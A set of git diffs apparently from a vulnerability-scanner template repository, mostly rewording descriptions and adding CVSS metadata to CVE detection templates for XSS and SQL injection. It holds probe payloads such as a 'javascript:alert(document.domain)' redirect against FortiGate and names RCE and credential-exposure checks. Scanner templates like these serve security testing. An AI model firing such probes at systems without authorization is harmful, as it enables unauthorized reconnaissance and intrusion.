a/cves/2017/CVE-2017-14186.yaml b/cves/2017/CVE-2017-14186.yaml index 801101d0e5..aa2d0536b5 100644 --- a/cves/2017/CVE-2017-14186.yaml +++ b/cves/2017/CVE-2017-14186.yaml @@ -1,5 +1,5 @@ -id: CVE-2017-14186 - +id: CVE-2017-14186 + info: name: FortiGate SSL VPN Web Portal - Cross Site Scripting author: johnk3r @@ -10,7 +10,7 @@ info: - https://www.fortiguard.com/psirt/FG-IR-17-242 - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 - https://fortiguard.com/advisory/FG-IR-17-242 - - http://www.securitytracker.com/id/1039891 + - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 @@ -20,23 +20,23 @@ info: shodan-query: port:10443 http.favicon.hash:945408572 verified: "true" tags: cve,cve2017,fortigate,xss,fortinet -requests: - - method: GET - path: - - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 +requests: + - method: GET + path: + - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml index a78f44813e..4007207dee 100644 --- a/cves/2017/CVE-2017-8917.yaml +++ b/cves/2017/CVE-2017-8917.yaml @@ -9,7 +9,7 @@ info: reference: - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - https://nvd.nist.gov/vuln/detail/CVE-2017-8917 - - http://www.securitytracker.com/id/1038522 + - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/cves/2022/CVE-2022-1916.yaml b/cves/2022/CVE-2022-1916.yaml index f194e6a531..2f98314a2d 100644 --- a/cves/2022/CVE-2022-1916.yaml +++ b/cves/2022/CVE-2022-1916.yaml @@ -1,11 +1,11 @@ id: CVE-2022-1916 info: - name: Active Products Tables for WooCommerce < 1.0.5 - Cross Site Scripting + name: WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting author: Akincibor severity: medium description: | - The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting. + WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808 - https://nvd.nist.gov/vuln/detail/CVE-2022-1916 @@ -44,3 +44,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-1933.yaml b/cves/2022/CVE-2022-1933.yaml index d1e2bb36b6..377b69c9d1 100644 --- a/cves/2022/CVE-2022-1933.yaml +++ b/cves/2022/CVE-2022-1933.yaml @@ -1,11 +1,11 @@ id: CVE-2022-1933 info: - name: CDI < 5.1.9 - Cross Site Scripting + name: WordPress CDI <5.1.9 - Cross Site Scripting author: Akincibor severity: medium description: | - The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting. + WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf - https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/ @@ -41,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-22242.yaml b/cves/2022/CVE-2022-22242.yaml index 91ce741c36..c88e8381b9 100644 --- a/cves/2022/CVE-2022-22242.yaml +++ b/cves/2022/CVE-2022-22242.yaml @@ -5,12 +5,12 @@ info: author: EvergreenCartoons severity: medium description: | - A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim's browser in the context of their session within J-Web + Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. reference: - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-22242 - https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US - https://kb.juniper.net/JSA69899 + - https://nvd.nist.gov/vuln/detail/CVE-2022-22242 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -43,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-26263.yaml b/cves/2022/CVE-2022-26263.yaml index f64e5c0f26..fcdbda3638 100644 --- a/cves/2022/CVE-2022-26263.yaml +++ b/cves/2022/CVE-2022-26263.yaml @@ -1,16 +1,19 @@ id: CVE-2022-26263 info: - name: Yonyou u8 v13.0 - Cross Site Scripting + name: Yonyou U8 13.0 - Cross-Site Scripting author: edoardottt,theamanrawat severity: medium description: | - Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp. + Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md - https://nvd.nist.gov/vuln/detail/CVE-2022-26263 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 cve-id: CVE-2022-26263 + cwe-id: CWE-80 metadata: verified: true google-dork: inurl:/u8sl/WebHelp @@ -29,3 +32,5 @@ headless: - 'alert(document.domain)")' condition: and + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-3506.yaml b/cves/2022/CVE-2022-3506.yaml index 558d3ad7f9..be43c1c809 100644 --- a/cves/2022/CVE-2022-3506.yaml +++ b/cves/2022/CVE-2022-3506.yaml @@ -1,15 +1,16 @@ id: CVE-2022-3506 info: - name: WordPress Related Posts <= 2.1.2 - Cross-Site Scripting + name: WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting author: arafatansari severity: medium description: | - The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability. + WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/ - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828 - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81 + - https://nvd.nist.gov/vuln/detail/CVE-2022-3506 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 @@ -62,3 +63,5 @@ requests: regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' internal: true + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml index fb65fa2963..e45ba3bf0c 100644 --- a/cves/2022/CVE-2022-3578.yaml +++ b/cves/2022/CVE-2022-3578.yaml @@ -1,11 +1,11 @@ id: CVE-2022-3578 info: - name: ProfileGrid < 5.1.1 - Cross-Site Scripting + name: WordPress ProfileGrid <5.1.1 - Cross-Site Scripting author: theamanrawat severity: medium description: | - The ProfileGrid WordPress plugin before 5.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ @@ -42,3 +42,5 @@ requests: - 'contains(body_2, "Extension Options")' - 'contains(body_2, "&tab")' condition: and + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-40359.yaml b/cves/2022/CVE-2022-40359.yaml index 1aa259a1f4..57167dc921 100644 --- a/cves/2022/CVE-2022-40359.yaml +++ b/cves/2022/CVE-2022-40359.yaml @@ -1,15 +1,15 @@ id: CVE-2022-40359 info: - name: kfm <= 1.4.7 - Reflected Cross-Site Scripting + name: Kae's File Manager <=1.4.7 - Cross-Site Scripting author: edoardottt,daffainfo severity: medium description: | - Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php. + Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks reference: - https://cxsecurity.com/issue/WLB-2022090057 - - https://nvd.nist.gov/vuln/detail/CVE-2022-40359 - https://code.google.com/archive/p/kfm/downloads + - https://nvd.nist.gov/vuln/detail/CVE-2022-40359 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -43,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-40879.yaml b/cves/2022/CVE-2022-40879.yaml index 259e338bed..13bd42c2a8 100644 --- a/cves/2022/CVE-2022-40879.yaml +++ b/cves/2022/CVE-2022-40879.yaml @@ -5,7 +5,7 @@ info: author: arafatansari severity: medium description: | - kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the parameter 'errorMsg.' + kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/kekingcn/kkFileView/issues/389 - https://nvd.nist.gov/vuln/detail/CVE-2022-40879 @@ -41,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-42746.yaml b/cves/2022/CVE-2022-42746.yaml index c52edb12b4..adadc0de09 100644 --- a/cves/2022/CVE-2022-42746.yaml +++ b/cves/2022/CVE-2022-42746.yaml @@ -1,16 +1,19 @@ id: CVE-2022-42746 info: - name: CandidATS v3.0.0 - Cross Site Scripting. + name: CandidATS 3.0.0 - Cross-Site Scripting. author: arafatansari - severity: Medium + severity: medium description: | - CandidATS v3.0.0 on 'indexFile' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. + CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://fluidattacks.com/advisories/modestep/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42746 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 cve-id: CVE-2022-42746 + cwe-id: CWE-80 metadata: verified: true shodan-query: http.html:"CandidATS" @@ -38,3 +41,5 @@ requests: - type: status status: - 404 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-42747.yaml b/cves/2022/CVE-2022-42747.yaml index 972d4dcc82..767e94ed5a 100644 --- a/cves/2022/CVE-2022-42747.yaml +++ b/cves/2022/CVE-2022-42747.yaml @@ -1,16 +1,16 @@ id: CVE-2022-42747 info: - name: CandidATS v3.0.0 - Cross Site Scripting. + name: CandidATS 3.0.0 - Cross-Site Scripting. author: arafatansari severity: medium description: | - CandidATS v3.0.0 on 'sortBy' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. + CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://fluidattacks.com/advisories/modestep/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-42747 - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-42747 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -43,3 +43,5 @@ requests: - type: status status: - 404 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-42748.yaml b/cves/2022/CVE-2022-42748.yaml index e09874e375..adcfac438a 100644 --- a/cves/2022/CVE-2022-42748.yaml +++ b/cves/2022/CVE-2022-42748.yaml @@ -1,16 +1,16 @@ id: CVE-2022-42748 info: - name: CandidATS v3.0.0 - Cross Site Scripting. + name: CandidATS 3.0.0 - Cross-Site Scripting. author: arafatansari severity: medium description: | - CandidATS v3.0.0 on 'sortDirection' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. + CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://fluidattacks.com/advisories/modestep/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-42748 - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-42748 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -43,3 +43,5 @@ requests: - type: status status: - 404 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-42749.yaml b/cves/2022/CVE-2022-42749.yaml index 987542e974..37d5666fc2 100644 --- a/cves/2022/CVE-2022-42749.yaml +++ b/cves/2022/CVE-2022-42749.yaml @@ -1,16 +1,16 @@ id: CVE-2022-42749 info: - name: CandidATS v3.0.0 - Cross Site Scripting. + name: CandidATS 3.0.0 - Cross-Site Scripting author: arafatansari severity: medium description: | - CandidATS v3.0.0 on 'page' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. + CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://fluidattacks.com/advisories/modestep/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-42749 - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-42749 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -44,3 +44,5 @@ requests: - type: status status: - 404 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml index 8c6fad11b5..896193e035 100644 --- a/cves/2022/CVE-2022-43014.yaml +++ b/cves/2022/CVE-2022-43014.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43014 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43014 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43015.yaml b/cves/2022/CVE-2022-43015.yaml index 27b9c7efb6..ba07736c00 100644 --- a/cves/2022/CVE-2022-43015.yaml +++ b/cves/2022/CVE-2022-43015.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43015 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage parameter. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_entriesPerPage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43015 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43016.yaml b/cves/2022/CVE-2022-43016.yaml index 3bd1bfbfde..79f6773f15 100644 --- a/cves/2022/CVE-2022-43016.yaml +++ b/cves/2022/CVE-2022-43016.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43016 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback component. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_callback.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43016 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43017.yaml b/cves/2022/CVE-2022-43017.yaml index 842c3e8bd8..4088db0a0b 100644 --- a/cves/2022/CVE-2022-43017.yaml +++ b/cves/2022/CVE-2022-43017.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43017 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43017 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/cves/2022/CVE-2022-43018.yaml b/cves/2022/CVE-2022-43018.yaml index 0eb0bcc1a4..de8bd46573 100644 --- a/cves/2022/CVE-2022-43018.yaml +++ b/cves/2022/CVE-2022-43018.yaml @@ -1,11 +1,11 @@ id: CVE-2022-43018 info: - name: OpenCATS v0.9.6 - Cross Site Scripting + name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | - OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function. + OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43018 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/miscellaneous/x-recruiting-header.yaml b/miscellaneous/x-recruiting-header.yaml index 286584c2d6..df3ab40f16 100644 --- a/miscellaneous/x-recruiting-header.yaml +++ b/miscellaneous/x-recruiting-header.yaml @@ -6,7 +6,7 @@ info: severity: info description: Websites that advertise jobs via HTTP headers reference: - - https://www.shodan.io/search?query=%22X-Recruiting%3A%22 + - https://webtechsurvey.com/response-header/x-recruiting metadata: verified: true shodan-query: "X-Recruiting:" diff --git a/misconfiguration/mysqld-exporter-metrics.yaml b/misconfiguration/mysqld-exporter-metrics.yaml index 5ceb1a3d80..74a987770d 100644 --- a/misconfiguration/mysqld-exporter-metrics.yaml +++ b/misconfiguration/mysqld-exporter-metrics.yaml @@ -1,9 +1,14 @@ id: mysqld-exporter-metrics info: - name: Detect MySQLd Exporter + name: MySQL Exporter Panel - Detect author: DhiyaneshDk severity: low + description: MYSQL Exporter panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"MySQLd exporter" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/vulnerabilities/other/aerocms-sqli.yaml b/vulnerabilities/other/aerocms-sqli.yaml index a0beb4e3c0..61daaf465d 100644 --- a/vulnerabilities/other/aerocms-sqli.yaml +++ b/vulnerabilities/other/aerocms-sqli.yaml @@ -1,14 +1,18 @@ id: aerocms-sqli info: - name: Aero CMS v0.0.1 - SQL Injection + name: AeroCMS 0.0.1 - SQL Injection author: shivampand3y severity: high description: | - The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks.The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes. + AeroCMS 0.0.1 contains a SQL injection vulnerability via the author parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://www.exploit-db.com/exploits/51022 - https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 metadata: verified: true tags: aero,cms,sqli,edb @@ -33,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/vulnerabilities/other/steve-xss.yaml b/vulnerabilities/other/steve-xss.yaml index 91cd1f7cd8..7df133c7fe 100644 --- a/vulnerabilities/other/steve-xss.yaml +++ b/vulnerabilities/other/steve-xss.yaml @@ -5,9 +5,13 @@ info: author: clem9669 severity: medium description: | - The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points. + SteVe contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/steve-community/steve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 metadata: verified: true shodan-query: http.title:"SteVe - Steckdosenverwaltung" @@ -36,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/vulnerabilities/other/wuzhicms-sqli.yaml b/vulnerabilities/other/wuzhicms-sqli.yaml index e9f5196811..8365c50777 100644 --- a/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/vulnerabilities/other/wuzhicms-sqli.yaml @@ -37,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 diff --git a/vulnerabilities/wordpress/wptouch-xss.yaml b/vulnerabilities/wordpress/wptouch-xss.yaml index b3abb2fe8f..0cbdcf8a7b 100644 --- a/vulnerabilities/wordpress/wptouch-xss.yaml +++ b/vulnerabilities/wordpress/wptouch-xss.yaml @@ -1,14 +1,18 @@ id: wptouch-xss info: - name: WPtouch < 4.3.44 - Cross Site Scripting + name: WordPress WPtouch <4.3.44 - Cross-Site Scripting author: akincibor severity: medium description: | - The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. + WordPress WPtouch plugin prior to 4.3.44 contains a cross-site scripting vulnerability. The plugin does not escape some URLs before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://wpscan.com/vulnerability/7dbd8348-9c5d-4d62-a0f4-2b7c2b7e58e4 - https://wordpress.org/plugins/wptouch/advanced/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan requests: @@ -48,3 +52,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/13 From a5fade36dd712daf9875ed40bdf43db95044ae32 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 10:43:47 +0530 Subject: [PATCH 0422/1133] Update CVE-2022-4050.yaml --- cves/2022/CVE-2022-4050.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index a0ed1b9e47..f18f0c41f9 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -32,8 +32,8 @@ requests: matchers: - type: dsl dsl: - - 'duration>=6' + - 'duration>=3' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' - condition: and \ No newline at end of file + condition: and From 2a44b0c721e3b8646614e1df062f6d8bc8d71a99 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Dec 2022 05:32:46 +0000 Subject: [PATCH 0423/1133] Auto Generated New Template Addition List [Wed Dec 14 05:32:46 UTC 2022] :robot: --- .new-additions | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/.new-additions b/.new-additions index 1993cf76e1..29a7f3d958 100644 --- a/.new-additions +++ b/.new-additions @@ -1,16 +1,33 @@ cves/2019/CVE-2019-6802.yaml cves/2021/CVE-2021-20323.yaml cves/2021/CVE-2021-24827.yaml +cves/2021/CVE-2021-25099.yaml cves/2022/CVE-2022-0826.yaml cves/2022/CVE-2022-0948.yaml +cves/2022/CVE-2022-2314.yaml +cves/2022/CVE-2022-45917.yaml default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml +exposed-panels/gyra-master-admin.yaml +exposed-panels/ilias-panel.yaml exposed-panels/mag-dashboard-panel.yaml +exposed-panels/microfocus-admin-server.yaml exposed-panels/netris-dashboard-panel.yaml +exposed-panels/planet-estream-panel.yaml +exposed-panels/verizon-router-panel.yaml exposures/configs/config-json.yaml +exposures/configs/golangci-config.yaml +exposures/configs/stestr-config.yaml +exposures/files/database-credentials.yaml exposures/files/gradle-libs.yaml +exposures/files/kubernetes-etcd-keys.yaml exposures/files/routes-ini.yaml +exposures/files/svn-wc-db.yaml +exposures/logs/badarg-log.yaml +exposures/logs/firebase-debug-log.yaml +exposures/logs/npm-debug-log.yaml iot/homeworks-illumination.yaml +misconfiguration/installer/easyscripts-installer.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/finger-detect.yaml @@ -18,5 +35,8 @@ network/detection/redis-detect.yaml network/detection/rpcbind-portmapper-detect.yaml takeovers/leadpages-takeover.yaml technologies/apache/apache-karaf-panel.yaml +technologies/icecast-server-detect.yaml vulnerabilities/nps/nps-auth-bypass.yaml +vulnerabilities/qibocms-file-download.yaml +vulnerabilities/vmware/vmware-nsx-stream-rce.yaml vulnerabilities/zend/zend-v1-xss.yaml From e56fe0734de91be31f3bd08a9db963c1239c7853 Mon Sep 17 00:00:00 2001 From: sandeep 